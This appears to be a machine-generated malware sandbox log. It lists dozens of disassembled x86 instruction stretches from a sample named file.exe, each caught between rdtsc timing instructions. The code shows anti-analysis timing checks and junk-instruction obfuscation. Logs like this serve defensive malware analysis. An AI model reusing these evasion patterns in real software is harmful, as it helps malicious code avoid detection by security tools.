                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAEF9 second address: 12BAF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8E8F833BAh 0x00000009 jmp 00007FF8E8F833BAh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BAF11 second address: 12BAF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BB19E second address: 12BB1A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BB2FC second address: 12BB329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FF8E8F8DBBEh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8E8F8DBC4h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCD6B second address: 12BCDCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF8E8F833BCh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jc 00007FF8E8F833CEh 0x0000001a jmp 00007FF8E8F833C8h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FF8E8F833C4h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCDCC second address: 12BCDE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FF8E8F8DBBCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCDE3 second address: 12BCDED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF8E8F833B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCEF4 second address: 12BCF01 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCF01 second address: 12BCF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF8E8F833B6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCF0C second address: 12BCF11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCF11 second address: 12BCF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FF8E8F833B8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 cld 0x00000025 call 00007FF8E8F833B9h 0x0000002a pushad 0x0000002b push ebx 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e pop ebx 0x0000002f jmp 00007FF8E8F833BCh 0x00000034 popad 0x00000035 push eax 0x00000036 push edi 0x00000037 push eax 0x00000038 push eax 0x00000039 pop eax 0x0000003a pop eax 0x0000003b pop edi 0x0000003c mov eax, dword ptr [esp+04h] 0x00000040 push eax 0x00000041 jno 00007FF8E8F833BCh 0x00000047 pop eax 0x00000048 mov eax, dword ptr [eax] 0x0000004a push eax 0x0000004b push edx 0x0000004c jg 00007FF8E8F833C8h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCF8E second address: 12BCFA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jo 00007FF8E8F8DBC4h 0x00000012 pushad 0x00000013 jc 00007FF8E8F8DBB6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD0DD second address: 12BD0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD0E3 second address: 12BD188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FF8E8F8DBC1h 0x0000000b jmp 00007FF8E8F8DBBBh 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FF8E8F8DBC3h 0x0000001a pop eax 0x0000001b adc ecx, 2BEFA599h 0x00000021 push 00000003h 0x00000023 js 00007FF8E8F8DBBCh 0x00000029 add dword ptr [ebp+122D2CEFh], edi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007FF8E8F8DBB8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b sub dword ptr [ebp+122D2D07h], ebx 0x00000051 jo 00007FF8E8F8DBC8h 0x00000057 jmp 00007FF8E8F8DBC2h 0x0000005c push 00000003h 0x0000005e mov esi, dword ptr [ebp+122D37C2h] 0x00000064 pushad 0x00000065 jl 00007FF8E8F8DBBBh 0x0000006b mov ecx, 0FF148B7h 0x00000070 popad 0x00000071 push 7CFEE0B3h 0x00000076 pushad 0x00000077 jng 00007FF8E8F8DBBCh 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD188 second address: 12BD1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b add dword ptr [esp], 43011F4Dh 0x00000012 jmp 00007FF8E8F833C6h 0x00000017 lea ebx, dword ptr [ebp+1244EBF0h] 0x0000001d push ebx 0x0000001e jbe 00007FF8E8F833BCh 0x00000024 or dword ptr [ebp+122D316Ch], esi 0x0000002a pop edi 0x0000002b xchg eax, ebx 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jg 00007FF8E8F833B6h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD1CE second address: 12BD1E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF8E8F8DBB8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD1E0 second address: 12BD1E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B5A50 second address: 12B5A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC607 second address: 12DC60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC60C second address: 12DC62F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF8E8F8DBC5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c jno 00007FF8E8F8DBB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DCFB4 second address: 12DCFCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DCFCF second address: 12DCFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD128 second address: 12DD132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF8E8F833B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD132 second address: 12DD13C instructions: 0x00000000 rdtsc 0x00000002 je 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD13C second address: 12DD155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF8E8F833BAh 0x0000000a jbe 00007FF8E8F833B6h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD71C second address: 12DD742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF8E8F8DBC8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD742 second address: 12DD763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833C7h 0x00000007 jc 00007FF8E8F833B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD763 second address: 12DD773 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FF8E8F8DBB6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D16E9 second address: 12D16EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE2A0 second address: 12DE2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2AE second address: 12AD2B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2B4 second address: 12AD2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2BE second address: 12AD2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2C2 second address: 12AD2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2C6 second address: 12AD2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FF8E8F833B6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2D5 second address: 12AD2EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8E8F8DBBDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AD2EA second address: 12AD2EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8CE6 second address: 12E8CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8CEC second address: 12E8CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8CF0 second address: 12E8D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FF8E8F8DBC2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8D00 second address: 12E8D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8D06 second address: 12E8D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007FF8E8F8DBB6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8D13 second address: 12E8D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF8E8F833C5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8E8F833C5h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8EF2 second address: 12E8F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F8DBC8h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8F0F second address: 12E8F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF8E8F833B6h 0x00000009 jmp 00007FF8E8F833BBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E907B second address: 12E9097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FF8E8F8DBC0h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9097 second address: 12E909D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9377 second address: 12E9393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F8DBC8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9681 second address: 12E968B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E968B second address: 12E96A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC4h 0x00000007 jo 00007FF8E8F8DBB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E96A9 second address: 12E96BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8E8F833BCh 0x00000009 jng 00007FF8E8F833B6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA646 second address: 12EA64B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA64B second address: 12EA651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EABDD second address: 12EABEB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EABEB second address: 12EABEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAD81 second address: 12EAD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAD86 second address: 12EAD90 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8E8F833BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAD90 second address: 12EAD9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAD9C second address: 12EADA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAE7A second address: 12EAE7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAE7E second address: 12EAEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FF8E8F833B8h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF8E8F833C6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB64B second address: 12EB650 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB712 second address: 12EB716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB716 second address: 12EB71C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC6F2 second address: 12EC6F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EC6F7 second address: 12EC6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EDEBF second address: 12EDEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE9ED second address: 12EE9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EEC60 second address: 12EEC64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EEC64 second address: 12EECCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF8E8F8DBBCh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FF8E8F8DBB8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FF8E8F8DBB8h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FF8E8F8DBC2h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EECCE second address: 12EECD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EF4C4 second address: 12EF4C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFFD2 second address: 12EFFDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF8E8F833B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2781 second address: 12F2785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F14B1 second address: 12F14B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C35 second address: 12F8C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C39 second address: 12F8C5D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF8E8F833B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8E8F833C6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C5D second address: 12F8C62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C62 second address: 12F8C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8C68 second address: 12F8CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jo 00007FF8E8F8DBBCh 0x0000000e add ebx, dword ptr [ebp+1245D9F1h] 0x00000014 push 00000000h 0x00000016 call 00007FF8E8F8DBBFh 0x0000001b mov ebx, dword ptr [ebp+12450916h] 0x00000021 pop edi 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007FF8E8F8DBB8h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e push eax 0x0000003f pushad 0x00000040 jns 00007FF8E8F8DBB8h 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAB86 second address: 12FAB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAB8A second address: 12FABA9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FF8E8F8DBBCh 0x00000010 jp 00007FF8E8F8DBB6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FABA9 second address: 12FABAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FABAE second address: 12FABB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF8E8F8DBB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FABB9 second address: 12FABC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF8E8F833B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FABC5 second address: 12FABE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF8E8F8DBC3h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edx 0x0000000e jno 00007FF8E8F8DBB6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEDA9 second address: 12AEDAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AEDAE second address: 12AEDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC11B second address: 12FC11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
